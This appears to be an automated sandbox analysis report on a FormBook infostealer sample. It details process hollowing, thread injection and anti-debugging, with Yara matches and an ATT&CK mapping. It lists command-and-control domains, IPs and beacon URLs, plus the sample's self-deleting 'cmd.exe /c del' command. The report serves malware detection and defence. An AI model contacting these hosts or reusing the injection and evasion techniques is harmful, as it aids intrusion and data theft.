          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0472B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0472B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04748A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04704257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0473AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0473AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0467E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0472FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_04688A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0467C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0467C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0467C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046A8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0467AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0467AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_04693A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_04675210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_04675210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_04675210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_04675210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_04731608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046A2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046A2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_04748ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0472FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_04740EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_04740EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_04740EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0468AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0468AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0470FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0467DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0468FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_04748F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0467DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0468EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_04748B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0467F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_04674F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_04674F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0470FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0470FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.huongdandidong.com
          Source: C:\Windows\explorer.exe | Domain query: www.opusleaf.com
          Source: C:\Windows\explorer.exe | Domain query: www.luxel01.com
          Source: C:\Windows\explorer.exe | Network Connect: 160.153.136.3 80
          Source: C:\Windows\explorer.exe | Network Connect: 5.101.152.161 80
          Source: C:\Windows\explorer.exe | Domain query: www.simplyhealrhcareplans.com
          Source: C:\Windows\explorer.exe | Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe | Network Connect: 108.186.210.142 80
          Source: C:\Windows\explorer.exe | Domain query: www.myboardinghome.com
          Source: C:\Windows\explorer.exe | Network Connect: 3.223.115.185 80
          Source: C:\Windows\explorer.exe | Network Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exe | Network Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exe | Network Connect: 144.76.207.76 80
          Source: C:\Windows\explorer.exe | Domain query: www.seymor-law.com
          Source: C:\Windows\explorer.exe | Domain query: www.muzhskoy-eskort.site
          Source: C:\Windows\explorer.exe | Domain query: www.shopthen2.site
          Source: C:\Windows\explorer.exe | Network Connect: 118.27.122.19 80
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Domain query: www.lewishackney.com
          Source: C:\Windows\explorer.exe | Domain query: www.ecomcourse.online
          Source: C:\Windows\explorer.exe | Domain query: www.karizcustomizeme.com
          Source: C:\Windows\explorer.exe | Domain query: www.anadelalastra.art
          Source: C:\Windows\explorer.exe | Domain query: www.orchidandiris.com
          Contains functionality to prevent local Windows debugging
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 0_2_737F1000 Hyvkfcorf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Section loaded: unknown target: C:\Users\user\Desktop\LWlcpDjYIQ.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\cmstp.exe | Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 220000
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Process created: C:\Users\user\Desktop\LWlcpDjYIQ.exe 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: explorer.exe, 00000005.00000000.220055270.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.220307283.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000007.00000002.476143655.0000000002F00000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.220307283.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000007.00000002.476143655.0000000002F00000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.220307283.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000007.00000002.476143655.0000000002F00000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.220307283.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000007.00000002.476143655.0000000002F00000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API 1 | Path Interception | Process Injection 612 | Virtualization/Sandbox Evasion 3 | Input Capture 1 | Query Registry 1 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 612 | LSASS Memory | Security Software Discovery 241 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Virtualization/Sandbox Evasion 3 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 11 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | File and Directory Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery 12 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

          Behavior Graph

          Behavior Graph ID: 383953 | Sample: LWlcpDjYIQ.exe | Startdate: 08/04/2021 | Architecture: WINDOWS | Score: 100

          Sample-level DNS/IP info: www.socialunified.com; www.kaashir.com; HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com
          Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures

          Process tree recovered from the graph:
          • LWlcpDjYIQ.exe 18 (started)
            Dropped file: C:\Users\user\AppData\Local\Temp\...\9a5t.dll, PE32
            Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Contains functionality to prevent local Windows debugging
            • LWlcpDjYIQ.exe (started)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              • explorer.exe (injected)
                DNS/IP info: www.huongdandidong.com 108.186.210.142, 49731, 80 PEGTECHINCUS United States; www.luxel01.com 118.27.122.19, 49722, 80 INTERQGMOInternetIncJP Japan; 17 other IPs or domains
                Signatures: System process connects to network (likely due to code injection or exploit)
                • cmstp.exe (started)
                  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                  • cmd.exe 1 (started)
                    • conhost.exe (started)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          LWlcpDjYIQ.exe | 66% | ReversingLabs | Win32.Trojan.Wacatac

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll | 24% | ReversingLabs | Win32.Trojan.Wacatac

          Unpacked PE Files

          Source | Detection | Scanner | Label
          7.2.cmstp.exe.45c708.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
          0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.2.cmstp.exe.4b87960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
          0.2.LWlcpDjYIQ.exe.737f0000.6.unpack | 100% | Avira | HEUR/AGEN.1131513
          2.1.LWlcpDjYIQ.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.2.LWlcpDjYIQ.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.huongdandidong.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=94GGx2Cs8EYqYWyk7qEtIIzRN3fkRhfUxg2Vtzz5w0QY/7xu41tS8mQoIQP3aceFOvfi | 0% | Avira URL Cloud | safe
          www.simplyhealrhcareplans.com/sqra/ | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.simplyhealrhcareplans.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.socialunified.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=nD+8EQ/dkrvxrfeXfZTM4uqVidyysXGGAQQPcyuh+D+qYnXcwF5fcGHppY2Ae0Rizhob | 0% | Avira URL Cloud | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.lewishackney.com/sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJV | 100% | Avira URL Cloud | malware
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.luxel01.com/sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJV | 0% | Avira URL Cloud | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.orchidandiris.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=zH8yL9FtafuknHUuv+0OAb189SbLD7IfmvNkOBi8bJNQNfTK09EYjoUTP6M+ilwbYPXy | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.ecomcourse.online/sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJV | 100% | Avira URL Cloud | malware
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.karizcustomizeme.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy | 0% | Avira URL Cloud | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.anadelalastra.art/sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV | 0% | Avira URL Cloud | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.shopthen2.site/sqra/?lzul=wRDL7BohbLBLJV&NBZl=0hvqTGsG2LXykKa15oAG/2YmS9ez8HJt/56JneCT4XqEJpzhFqXtEbyiFIIf71vevGG9 | 0% | Avira URL Cloud | safe
          http://www.muzhskoy-eskort.site/sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJV | 100% | Avira URL Cloud | malware

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          ecomcourse.online | 184.168.131.241 | true | true | | unknown
          www.huongdandidong.com | 108.186.210.142 | true | true | | unknown
          www.muzhskoy-eskort.site | 144.76.207.76 | true | true | | unknown
          karizcustomizeme.com | 160.153.136.3 | true | true | | unknown
          www.shopthen2.site | 5.101.152.161 | true | true | | unknown
          www.luxel01.com | 118.27.122.19 | true | true | | unknown
          orchidandiris.com | 34.102.136.180 | true | false | | unknown
          HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | 3.223.115.185 | true | false | | high
          www.simplyhealrhcareplans.com | 199.59.242.153 | true | true | | unknown
          lewishackney.com | 34.102.136.180 | true | false | | unknown
          www.kaashir.com | 208.91.197.27 | true | true | | unknown
          ext-sq.squarespace.com | 198.185.159.144 | true | false | | high
          www.opusleaf.com | unknown | unknown | true | | unknown
          www.myboardinghome.com | unknown | unknown | true | | unknown
          www.socialunified.com | unknown | unknown | true | | unknown
          www.seymor-law.com | unknown | unknown | true | | unknown
          www.lewishackney.com | unknown | unknown | true | | unknown
          www.ecomcourse.online | unknown | unknown | true | | unknown
          www.karizcustomizeme.com | unknown | unknown | true | | unknown
          www.anadelalastra.art | unknown | unknown | true | | unknown
          www.orchidandiris.com | unknown | unknown | true | | unknown

                                                    Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.huongdandidong.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=94GGx2Cs8EYqYWyk7qEtIIzRN3fkRhfUxg2Vtzz5w0QY/7xu41tS8mQoIQP3aceFOvfi | true | Avira URL Cloud: safe | unknown
          www.simplyhealrhcareplans.com/sqra/ | true | Avira URL Cloud: safe | low
